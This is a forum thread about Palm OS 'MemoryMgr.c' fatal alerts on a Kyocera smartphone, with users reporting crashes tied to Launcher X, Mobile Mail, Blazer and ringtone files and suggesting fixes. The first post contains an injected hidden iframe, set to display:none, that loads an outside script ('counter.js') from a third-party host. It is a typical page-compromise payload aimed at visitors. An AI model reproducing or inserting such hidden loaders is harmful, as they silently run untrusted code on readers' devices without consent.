+ Reply to Thread

Fatal Alert MemoryMgr

Howdy all,

I thought I would mention a new crash that I just got.

Fatal ALert
    MemoryMgr.c, Line:4372,
    Non-word-aligned handle

**Reset**

Now I am not sure what I was using before, but I hit the home button (to get into Launcher X trial version) I was in the car, so whatever I had been doing last night was the program before.

Wondering if anyone has had anything similar?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Walt

I am getting MemoryMgr.c, Line 4365, NULL handle.
    I am on my second phone after the first one froze as a result of a SnapperMail/Quick Office demo install. (This thread is on the board.) I do not know what this is related to but I always get it when I am trying to use Mobile Mail. Same fatal alert requiring a soft reset in the battery compartment.

Anyone have any ideas?

I have seen this as well. I have only seen it in LauncherX when scrolling down on one of the tabs. When I am at the bottom if I continue to hit down once or twice it will happen.

Atleast I don't do that very often.

Warey,
    I reinstalled Mobile Mail and the errors have stopped. Try un- and then reinstalling the app being used when you get the error.

I got it trying to sign on to aol on the software. It made me remember I had promised myself to ditch aol all together.

"Null Handle" usually implies that the application has a bug. On PalmOS, memory is preferably managed by using relocatable chunks of memories, which are referred to in handles.

"Null Handle" just means that the application passed a handle with the pointer 0 (e.g. an empty handle) to the OS. One example how this could happen is if the application tries to allocate some memory, this fails and it doesn't check for errors (bad).

Daniel Seifert
    79bmedia GmbH

I've got the "MemoryMgr.c, Line 4365, NULL handle" twice after using the Mark/Space fax demo program when I started to use Blazer. Does this indicate a problem with Mark/Space or Blazer? Is there a way to tell which program has this "bug" dseifert mentions?

wwk
    I've gotten "MemoryMgr.c, Line:4475 Invalid chunk ptr" on a couple of ocassions... requing a soft reset. No idea what's causing it, as I've added several apps in the last two days.

Originally posted by wwk
    I've gotten "MemoryMgr.c, Line:4475 Invalid chunk ptr" on a couple of ocassions... requing a soft reset. No idea what's causing it, as I've added several apps in the last two days.
    I have had my phone for a few weeks and have not done much except the basics. Today I loaded a few ringers from the files page and hotsync'd them to my phone. After playing with them I got the above error. The first error since having the phone. I traced it to a ringer file name having the same name as another (at least for the first few characters). I am not sure what the file structure unique number of characters is, but since I deleted the "duplicate" file I have not had the problem (at least not yet).

Originally posted by slorandy
    I've got the "MemoryMgr.c, Line 4365, NULL handle" twice after using the Mark/Space fax demo program when I started to use Blazer. Does this indicate a problem with Mark/Space or Blazer? Is there a way to tell which program has this "bug" dseifert mentions?
    I get this a lot when using Blazer, or more importantly since it is a built-in app, EIS. I think it is a bug in Kyocera's version of the palm OS. See the thread headed "spoke with a Kyocera engineer" http://www.smartphonesource.com/vbul...&threadid=7711

GWW